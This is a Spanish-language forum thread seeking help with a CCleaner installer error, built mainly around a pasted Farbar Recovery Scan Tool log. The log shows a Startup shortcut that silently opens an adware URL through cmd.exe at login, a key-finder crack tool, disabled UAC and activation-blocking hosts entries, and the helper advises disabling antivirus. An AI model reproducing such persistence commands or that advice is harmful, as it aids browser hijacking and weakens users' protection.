al ejecutar el instalador de ccleaner me aparece este error. tengo windows 7 ultimated
Probaste a reiniciar el Pc?
sì claro, y sigue sin funcionar
Vamos a probar una solución muy sencilla y que, quién sabe, lo mismo hasta funciona. Simplemente borra el instalador y vuelve a descargarlo, por si acaso está corrupto el archivo o algo.
sigue persistiendo el error, aun descargando de nuevo el instalador
-
Desactiva Temporalmente tu antivirus y cualquier programa de seguridad.
-
Descarga a Tu Escritorio >> Esto es muy importante<<.,Fabar Recovery Scan Tool, considerando la versión adecuada para tu equipo. (32 o 64 bits)
¿Cómo saber si mi Windows es de 32 o 64 bits? -
Doble clic para ejecutar Frst.exe. En la ventana del Disclaimer, presiona Si.
-
En la nueva ventana que se abre, presiona el botón Analizar y espera a que concluya el análisis.
-
Se abrirán dos (2) archivos (Logs), Frst.txt y Addition.txt, que estarán grabados en Tu escritorio.
En Tu próxima respuesta, copias y pegas los dos reportes Frst.txt y Addition.txt de FRST
Nota: Si el/los reportes solicitados no entraran en una sola respuesta porque superan la cantidad de caracteres permitidos, puedes utilizar dos o mas respuestas para pegarlos completamente.
me temo que el error persiste y ahora con el programa que usted me recomendó descargar. adjunto img
Ejecutalo en modo seguro
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (20-04-2020 13:03:47)
Ejecutado desde C:\Users\Familia Landaeta\Downloads
Microsoft Windows 7 Ultimate Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Safe Mode (minimal)
==========================================================
==================== Cuentas: =============================
Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)
==================== Centro de Seguridad ========================
(Si una entrada es incluida en el fixlist, será eliminada.)
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Programas instalados ======================
(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)
Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version: - Akamai Technologies, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 5.65 - Piriform)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version: - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version: - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 80.0.3987.163 - Google LLC)
Google Toolbar for Internet Explorer (HKLM\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version: - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version: - )
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Microsoft .NET Framework 4.5.2 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
TNod User & Password Finder (HKLM\...\TNod) (Version: 1.6.0.0 - Tukero[X]Team)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)
==================== Personalizado CLSID (Lista blanca): ==============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
==================== Codecs (Lista blanca) ====================
==================== Accesos directos & WMI ========================
(Las entradas pueden ser listadas para ser restauradas o eliminadas.)
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
ShortcutWithArgument: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /c explorer hxxp://www2.savemax.store/
==================== Módulos cargados (Lista blanca) =============
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL
==================== Alternate Data Streams (Lista blanca) ========
==================== Modo Seguro (Lista blanca) ==================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"
==================== Asociación (Lista blanca) =================
==================== Internet Explorer sitios de confianza/restringidos ==========
(Si una entrada es incluida en el fixlist, será eliminada del registro.)
IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com
==================== Hosts contenido: =========================
(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)
2009-07-13 22:04 - 2016-09-12 13:03 - 000000925 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1 genuine.microsoft.com
127.0.0.1 mpa.one.microsoft.com
127.0.0.1 sls.microsoft.com
==================== Otras Áreas ===========================
(Actualmente no existe una corrección automática para esta sección.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: El medio no está conectado a internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==
==================== Reglas de firewall (Lista blanca) ================
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
FirewallRules: [{1D304C31-0E0B-427B-A209-E245AA1DBA0E}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe Ningún archivo
FirewallRules: [TCP Query User{08E9F88E-7164-4C9B-A5E3-8425DF8A0747}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{7C01576F-27B7-45E5-A1CE-685AAF5261B6}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [{F4D4EDBD-9721-405F-9C5A-4B95FD161921}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{18C624E3-74F8-4BBF-B2EE-630BC42AB14A}] => (Allow) C:\Program Files\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{B9206133-DE27-4228-95A7-0011F165747D}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{7A9A70EE-3D37-4554-AF4F-88827A946410}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{8A3C1318-8B40-403D-ACF7-237DA2AABC78}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{C2F198D1-38BF-4B70-A00C-59073C44B99A}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{BB6C1793-D505-4156-BF7C-44AA81CF0711}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{E40546E9-EFB2-4C2E-9DD1-F46BA7C3EFF1}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{51BC5DE6-434E-4374-927A-7C4B7F4D6E2E}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [UDP Query User{D83BA905-0A2E-4671-A098-AB513C5AF9C4}C:\program files\activision\call of duty - black ops\blackops.exe] => (Allow) C:\program files\activision\call of duty - black ops\blackops.exe Ningún archivo
FirewallRules: [TCP Query User{7D14712A-D40E-4C4C-891B-7ECC745A6F20}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{E9CCF025-B6D4-49FE-8BB1-9DB454B02F51}C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{30ED4585-638A-49AA-B805-1C77B86BEDDF}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{D35A1BDA-FFEB-44E9-8347-220AE6105DAC}C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\desktop\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{1EAB70AF-D066-4767-ADCE-772024C20D56}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [UDP Query User{FB2593F0-E236-41D5-B4DC-0EF8ED94DD70}C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe] => (Allow) C:\users\familia landaeta\downloads\herogamers\gunz\gunz.exe Ningún archivo
FirewallRules: [TCP Query User{557B22A5-A1E1-4091-9E9A-08198F3A48EB}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [UDP Query User{A8614DE1-4000-47ED-8AA8-B4C20CD5091F}C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hl.exe Ningún archivo
FirewallRules: [TCP Query User{0492F1DA-2552-4AEE-B8DB-CB56494254CB}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [UDP Query User{4696A47D-283B-43B6-88EE-31158FF5D770}C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike 1.6\hltv.exe Ningún archivo
FirewallRules: [TCP Query User{51A1C049-CA80-46E3-B984-3CE89FF9413A}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [UDP Query User{43F840FA-25C1-4941-BB0F-9D9A51B666A0}C:\program files\activision\call of duty - black ops\blackopsmp.exe] => (Block) C:\program files\activision\call of duty - black ops\blackopsmp.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{AFD82A99-09A1-40A0-AC23-23AEBAD196FE}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [UDP Query User{533C26DC-9F35-4FC6-966D-68DEF983A7A8}C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe] => (Allow) C:\users\familia landaeta\documents\downloaderpwcz\czdescargajuego.exe Ningún archivo
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{6183A9D7-F63B-4886-B59E-69A31228E3BC}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{54AE04C6-B40D-4130-979F-B531E5C8EDDF}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_121\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{460BBF5E-3754-445B-8505-5CBE6E1021D6}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{E814B573-DA37-49A5-83BD-CE5E05C0DCCC}] => (Allow) C:\Program Files\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{1696113F-1966-4FC3-B829-3B234A7FD8E6}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [UDP Query User{F4F3BE95-61E7-4D15-840E-DCD853946D26}C:\program files\java\jre1.8.0_131\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_131\bin\javaw.exe Ningún archivo
FirewallRules: [TCP Query User{637D3EA8-C90E-4DF9-A58E-D23295AB44E9}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [UDP Query User{F7CF63A3-269B-4561-86AD-C2662D9EEE05}C:\kaybo\gunz ultra\gunzrun.exe] => (Allow) C:\kaybo\gunz ultra\gunzrun.exe Ningún archivo
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{A3B1ADA2-95B3-438B-8E54-9E9F940CAB9D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F5045B09-7686-438C-9E80-762ECB7B8BE7}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.129\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AAA550EE-3077-4845-B4D5-7762BB872C3D}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{D8F93572-717C-408E-BA54-9BEDE5B0303A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.133\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A6E4636-3DF1-4590-9201-2899EA3D816A}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{AC5587DE-29AA-4F28-87C6-A0375B02A192}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.137\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{36CA106A-8FE5-4816-A362-11330B441CC0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{84437487-7B69-45DE-968A-0F53DF5EBA95}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe] => (Block) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.138\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{9949CAE6-B7DA-4860-A8DC-F2109C62E003}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{BEFE0BA9-83CA-467F-A948-E40DF9FF7FF0}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.139\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{AB50A785-40D0-4058-8C6D-A4759B265D94}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EF6E007E-7365-40BD-A4F2-7886E791BED5}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.140\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{F842DFF2-F727-437F-8F21-5AF7983A5B8D}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [UDP Query User{6F5F8AB8-976F-41A2-A350-104515B0CB5B}C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe] => (Allow) C:\users\familia landaeta\documents\hdghdfg\eidos interactive\pyro\commandos\mpserver.exe Ningún archivo
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (UGG GAMERS LTDA -> Universe Gamers)
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (UGG GAMERS LTDA -> Universe Gamers)
FirewallRules: [TCP Query User{531C0145-8767-4816-8BE5-4C6E60C0DC16}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{411A3610-0A5E-4608-BD9C-CC136419CDAC}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{A622F54E-0B36-4531-835B-F26799ACC2F9}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{61240510-5F38-4C6A-A5EB-65A65617A4C1}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.155\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{BB08D777-19BC-4D75-B0A8-F49383F4EBC4}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{F1C0A4E3-114D-4026-9732-049EA38E069C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.156\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{1CAAE91B-4B4F-413E-BBF0-82CDA598D3DA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{47706439-E403-4C7D-9EDE-D1344A1F233C}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.157\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{2A5A7E4D-7749-4A93-A1AB-EF237471FA8B}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [UDP Query User{EC88AD74-D45F-4E8D-A40B-1C0CC426A16F}C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe] => (Allow) C:\users\familia landaeta\desktop\halo 1 campaña portable\halo 1\halo campaña.exe Ningún archivo
FirewallRules: [TCP Query User{7F91224D-8E51-4F55-9F4D-B608B29C4924}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [UDP Query User{EB15D02D-72EA-4DD6-ACFE-4642784E48AA}C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe] => (Allow) C:\riot games\league of legends\rads\projects\league_client\releases\0.0.0.158\deploy\leagueclient.exe Ningún archivo
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
